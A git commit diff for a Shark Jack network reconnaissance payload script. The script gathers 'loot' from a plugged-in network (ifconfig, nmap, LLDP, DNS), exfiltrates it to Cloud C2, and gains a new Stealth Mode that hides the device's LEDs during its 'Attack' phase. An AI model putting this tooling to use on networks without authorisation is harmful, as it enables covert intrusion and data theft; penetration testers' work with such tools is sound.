commit
8488e7594f
|
@ -1,12 +1,16 @@
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
#
|
#
|
||||||
# Title: network_recon.sh
|
# Title: payload.sh
|
||||||
# Description: Swiss knife network reconnaissance payload with options for SSH server, Cloud C2 exfiltration
|
# Description: Swiss knife network reconnaissance payload with options for loot capturing (e.g. DIG, NMAP, IFCONFIG, ARP-SCAN, LLDP),
|
||||||
# and led blinking for IP address, payload is based on various sample payloads from HAK5, MonsieurMarc,
|
# notification (e.g. Homey, Pushover (the best push notfications service!), Slack), exfiltration (e.g. Cloud C2, Pastebin,
|
||||||
# Topknot and others. This payload script has been organized in a way it is easy to be extended with
|
# Slack) and led blinking for IP address. Payload is based on various sample payloads from HAK5, MonsieurMarc, Topknot and
|
||||||
# additional recon (attack) functions.
|
# others.
|
||||||
# Author: Robert Coemans
|
# The script has been created in a modular fashion which allows easy extending the script with new functions (e.g. recon,
|
||||||
# Version: 1.0 (19-08-2020)
|
# notification or exfiltration functions). The script furthermore incorporates logic to determine already existing loot
|
||||||
|
# folders and create a new (unique) loot folder every time the script is executed.
|
||||||
|
# Author: Robert Coemans (robert[at]brainstoday.com)
|
||||||
|
# Version: 1.0 (19-08-2020), initial version
|
||||||
|
# 1.1 (21-08-2020), added Stealth Mode and fixed LLDP attack function
|
||||||
# Category: Recon
|
# Category: Recon
|
||||||
#
|
#
|
||||||
# Dependencies: this payload requires you to have the following packages already installed and configured via 'opkg install' (do 'opkg update' first):
|
# Dependencies: this payload requires you to have the following packages already installed and configured via 'opkg install' (do 'opkg update' first):
|
||||||
|
@ -38,16 +42,13 @@
|
||||||
# - "-Pn" No ping
|
# - "-Pn" No ping
|
||||||
# - "-O" Enable OS detection
|
# - "-O" Enable OS detection
|
||||||
# - "-A" Enable OS detection, version detection, script scanning and traceroute
|
# - "-A" Enable OS detection, version detection, script scanning and traceroute
|
||||||
#
|
|
||||||
# To do / to be fixed
|
|
||||||
# - Function to find neighbouring subnets
|
|
||||||
# - LLDPCLI not working with Unifi
|
|
||||||
|
|
||||||
# ****************************************************************************************************
|
# ****************************************************************************************************
|
||||||
# Configuration
|
# Configuration
|
||||||
# ****************************************************************************************************
|
# ****************************************************************************************************
|
||||||
|
|
||||||
# Setup toggles
|
# Setup toggles
|
||||||
|
STEALTH_MODE=false
|
||||||
CHANGE_HOSTNAME=false
|
CHANGE_HOSTNAME=false
|
||||||
CHANGE_MAC_ADDRESS=false
|
CHANGE_MAC_ADDRESS=false
|
||||||
LOOKUP_SUBNET=true
|
LOOKUP_SUBNET=true
|
||||||
|
@ -366,6 +367,11 @@ function GRAB_LLDP_LOOT() {
|
||||||
if [ "$GRAB_LLDP_LOOT" = "true" ]; then
|
if [ "$GRAB_LLDP_LOOT" = "true" ]; then
|
||||||
LLDP_LOOT_FILE=$LOOT_DIR/lldp.txt
|
LLDP_LOOT_FILE=$LOOT_DIR/lldp.txt
|
||||||
touch $LLDP_LOOT_FILE
|
touch $LLDP_LOOT_FILE
|
||||||
|
# Assign LLDPD to eth0 and restart the LLDPD service (without this it will fail)
|
||||||
|
lldpd -I eth0
|
||||||
|
sleep 5
|
||||||
|
/etc/init.d/lldpd restart
|
||||||
|
sleep 5
|
||||||
echo "****************************************************************************************************" >> $LLDP_LOOT_FILE
|
echo "****************************************************************************************************" >> $LLDP_LOOT_FILE
|
||||||
echo "LLDP neighbor details (lldpcli show neighbor details)" >> $LLDP_LOOT_FILE
|
echo "LLDP neighbor details (lldpcli show neighbor details)" >> $LLDP_LOOT_FILE
|
||||||
echo "****************************************************************************************************" >> $LLDP_LOOT_FILE
|
echo "****************************************************************************************************" >> $LLDP_LOOT_FILE
|
||||||
|
@ -620,7 +626,11 @@ function BLINK_INTERNAL_IP_ADDRESS() {
|
||||||
# ****************************************************************************************************
|
# ****************************************************************************************************
|
||||||
|
|
||||||
# Setup
|
# Setup
|
||||||
|
if [ "$STEALTH_MODE" = "true" ]; then
|
||||||
|
LED OFF
|
||||||
|
else
|
||||||
LED SETUP
|
LED SETUP
|
||||||
|
fi
|
||||||
CREATE_SCAN_FOLDER # Checks loot folder with highest index number in loot root folder and creates the next loot folder for current scan
|
CREATE_SCAN_FOLDER # Checks loot folder with highest index number in loot root folder and creates the next loot folder for current scan
|
||||||
INITIALIZE_LOG_FILE # Initialize the log file
|
INITIALIZE_LOG_FILE # Initialize the log file
|
||||||
SET_NETMODE # Set NETMODE to DHCP_CLIENT (for SharkJack v1.1.0+)
|
SET_NETMODE # Set NETMODE to DHCP_CLIENT (for SharkJack v1.1.0+)
|
||||||
|
@ -637,7 +647,9 @@ RECON_STARTED_NOTIFICATION
|
||||||
START_CLOUD_C2_CLIENT
|
START_CLOUD_C2_CLIENT
|
||||||
|
|
||||||
# Attack
|
# Attack
|
||||||
|
if [ ! "$STEALTH_MODE" = "true" ]; then
|
||||||
LED ATTACK
|
LED ATTACK
|
||||||
|
fi
|
||||||
GRAB_IFCONFIG_LOOT
|
GRAB_IFCONFIG_LOOT
|
||||||
GRAB_TRACEROUTE_LOOT
|
GRAB_TRACEROUTE_LOOT
|
||||||
GRAB_DNS_INFORMATION_LOOT
|
GRAB_DNS_INFORMATION_LOOT
|
||||||
|
@ -649,7 +661,9 @@ GRAB_NMAP_INTERESTING_HOSTS_LOOT
|
||||||
GRAB_DIG_LOOT
|
GRAB_DIG_LOOT
|
||||||
|
|
||||||
# Finish
|
# Finish
|
||||||
|
if [ ! "$STEALTH_MODE" = "true" ]; then
|
||||||
LED STAGE2
|
LED STAGE2
|
||||||
|
fi
|
||||||
echo "Free diskspace after actions: $(df -h | grep overlayfs | awk {'print $4'})" >> $LOG_FILE
|
echo "Free diskspace after actions: $(df -h | grep overlayfs | awk {'print $4'})" >> $LOG_FILE
|
||||||
echo "Recon script took $SECONDS seconds" >> $LOG_FILE
|
echo "Recon script took $SECONDS seconds" >> $LOG_FILE
|
||||||
EXFIL_TO_CLOUD_C2
|
EXFIL_TO_CLOUD_C2
|
||||||
|
@ -662,9 +676,10 @@ sync # Sync filesystem in order to prevent data loss
|
||||||
# Prevent logging after this line!
|
# Prevent logging after this line!
|
||||||
# ****************************************************************************************************
|
# ****************************************************************************************************
|
||||||
|
|
||||||
|
if [ ! "$STEALTH_MODE" = "true" ]; then
|
||||||
BLINK_INTERNAL_IP_ADDRESS
|
BLINK_INTERNAL_IP_ADDRESS
|
||||||
LED FINISH
|
LED FINISH
|
||||||
|
fi
|
||||||
if [ "$HALT_SYSTEM_WHEN_DONE" = "true" ]; then
|
if [ "$HALT_SYSTEM_WHEN_DONE" = "true" ]; then
|
||||||
halt
|
halt
|
||||||
fi
|
fi
|
||||||
|
|
Loading…
Reference in New Issue